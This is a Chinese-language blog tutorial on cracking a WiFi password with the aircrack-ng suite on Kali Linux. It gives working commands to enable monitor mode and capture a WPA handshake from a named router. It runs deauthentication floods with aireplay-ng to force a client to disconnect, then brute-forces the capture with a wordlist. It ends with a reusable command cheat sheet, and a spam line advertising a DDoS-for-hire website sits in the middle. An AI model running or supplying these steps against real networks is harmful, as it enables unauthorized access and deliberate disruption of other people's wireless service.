用aircrack-ng破解 wifi 密碼

開始前,先連上無線網卡,因爲虛擬機中的kali系統不用調用筆記本自帶的無線網卡,所以需要一個外接無線網卡,然後接入kali系統。

11.png

輸入 ifconfig -a 查看網卡,多了個 wlan0,說明網卡已經適配好,不然可能是驅動有問題。

12.png

開啓monitor模式,這裏有些進程會影響到monitor模式的開啓,如果開啓成功可忽略,不然就依提示操作。

13.png

按提示操作的結果:

14.png

監聽網絡,完了  Ctrl+C  退出。

15.png

主要參數說明:

#BSSID :路由器、AP的MAC地址

# PWR :信號強度,一看就是越小越強了

# #Data :傳輸的數據大小,大的可能在下載或看視頻什麼的

# CH      :無線信道,要看準

# ENC    :加密協議,自WPA2協議爆出重大安全漏洞,現已經出WPA3,坐等更新

# ESSID  :這個就不用多說了,wifi名稱,有中文可能會出現亂碼哈

3. 目標有了,開始對其進行cap包的監聽和獲取,這裏要讓其中連接的設備重連才能抓包其握手包,可以慢慢等待,也可以使用deauth洪水***。

 

root@huan:~#airodump-ng -c 9 --bssid 78:11:DC:10:4F:66 -w /root/桌面/wuxianpj/handshake/wlan0mon

// -w 後面的路徑是存放握手包的

16.png

4. 另起窗口,我們用deauth洪水***,讓其中的一臺設備掉線,它掉線後會自動連接(除非別人在wifi設置中勾選掉了自動連接)

root@huan:~#aireplay-ng -0 20 -c 6C:88:14:F2:47:8C -a 78:11:DC:10:4F:66 wlan0mon

// -0  death模式,20爲***次數,也可以設爲0,就是一直***

// -c 這裏自然就是連接上的某臺設備的MAC地址了,指定它,我們讓它穩穩地掉線。

17.png

5. 看圖,不廢話

18.png

6. 話不多說,上字典(關鍵東西),讓它慢慢破去吧

ddos,www.33ddos.com,大金DDOS網頁端,國內DDOS網頁端www.33ddos.com

root@huan:~#aircrack-ng -w /root/桌面/wuxianpj/zidian/wordlist.txt /root/桌面/wuxianpj/handshake/-02.cap

19.png

7. 沒錯下一步操作,退出monitor模式,別忘了喔

199.png

aircrack-ng 爆破wifi密碼 - 命令清單

~#airmon-ng start [網卡]       //開啓monitor模式

~#airodump-ng [網卡]          //捕獲附件的wifi信息

~#airodump-ng -c [信道]--bssid [路由器MAC] -w [handshake-path] [網卡]

~#aireplay-ng -0 [***次數值] -c [某連接設備MAC] -a [路由器MAC] [網卡]

~#aircrack-ng -w [字典-path] [破解的目標握手包-path]

~#airmon-ng stop [網卡]       //退出monitor模式


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章